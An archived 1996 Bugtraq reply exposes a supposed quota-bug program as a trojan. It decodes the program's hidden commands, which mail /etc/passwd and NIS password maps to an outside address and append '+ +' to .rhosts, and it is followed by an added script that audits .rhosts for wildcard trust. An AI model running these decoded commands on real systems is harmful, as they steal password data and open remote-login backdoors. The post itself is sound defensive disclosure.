[2978] in bugtraq


Re: quotas? maybe you're not seeing all of it

daemon@ATHENA.MIT.EDU (Don Lewis)
Mon Jul 22 21:38:52 1996

Date: 	Mon, 22 Jul 1996 14:30:17 -0700
Reply-To: Bugtraq List <BUGTRAQ@NETSPACE.ORG>
From: Don Lewis <Don.Lewis@tsc.tdk.com>
To: Multiple recipients of list BUGTRAQ <BUGTRAQ@NETSPACE.ORG>
In-Reply-To:  "Brett L. Hawn" <blh@nol.net> "quotas? maybe you're not seeing
              all of it" (Jul 21, 10:57am)

Trojan horse alert!

On Jul 21, 10:57am, "Brett L. Hawn" wrote:
} Subject: quotas? maybe you're not seeing all of it
} I finally found the source to this annoying little monster so I thought I'd
} let ya'll see it. I don't know off hand if this little bug has been seen
} before/discussed before but if it hasn't I'm quite sure all of you would
} love to fix it :) I've not tried it on anything but Solaris 2.5 so far but
} I've no doubt that it'll work elsewhere as well.
}
} What this does is takes a file and hides it in someone else's directories
} using sendmail.

I don't think so ...

I changed the system() calls to 'printf("%s\n", ...)'

} system(zipper(initseeds));

I couldn't make sense of this, initseeds appears to be mangled.

} system(zipper(setupseeds));

This executes:
        cat /etc/passwd 2>/dev/null | mail tsk@mail.thirdwave.net >/dev/null 2>/dev/null

} system(checkseed(binseeds));

This executes:
        ypcat passwd.byname 2>/dev/null | mail tsk@mail.thirdwave.net >/dev/null 2>/dev/null

but only if a directory in your path doesn't exist.

} system("%s\n",zipper(procseeds));

I don't think system() can be called with printf() style arguments, but
this executes:
        touch .rhosts 2>/dev/null

} system("%s\n",zipper(boutseeds));

This executes:
        echo + + 2>/dev/null >> .rhosts

} system("%s\n",zipper(shtdwnseeds));

This executes:
        chmod 700 .rhosts 2>/dev/null
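
An audit for the `+ +` entry that the decoded commands above append to `.rhosts`, as an added example that is not part of the original post. The function names and the sample directory tree are hypothetical and constructed for illustration.

```shell
#!/bin/sh
# Added example: report .rhosts lines that grant wildcard trust ("+" in the
# host or user field), such as the "+ +" line appended by the trojan.

# audit_rhosts DIR...
# Prints "path:line-number: content" for every wildcard entry found under the
# given directories. Returns 1 if any were found, 0 if the trees are clean.
audit_rhosts() {
    report=$(find "$@" -type f -name .rhosts -exec awk '
        # Skip comment lines; flag a bare "+" as host ($1) or user ($2).
        $1 !~ /^#/ && ($1 == "+" || $2 == "+") {
            print FILENAME ":" FNR ": " $0
        }
    ' {} + 2>/dev/null)
    if [ -n "$report" ]; then
        printf '%s\n' "$report"
        return 1
    fi
    return 0
}

# make_sample_tree
# Builds a constructed home-directory tree: alice has a normal .rhosts,
# bob has one with the wildcard line appended. Prints the tree's path.
make_sample_tree() {
    t=$(mktemp -d) || return 1
    mkdir -p "$t/alice" "$t/bob"
    printf '# trusted hosts\nbuild01 alice\n' > "$t/alice/.rhosts"
    printf 'build01 bob\n+ +\n' > "$t/bob/.rhosts"
    printf '%s\n' "$t"
}

# Demo on the constructed tree; on a real system pass the home directory root.
tree=$(make_sample_tree)
audit_rhosts "$tree" || echo "wildcard trust entries found"
rm -rf "$tree"
```
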
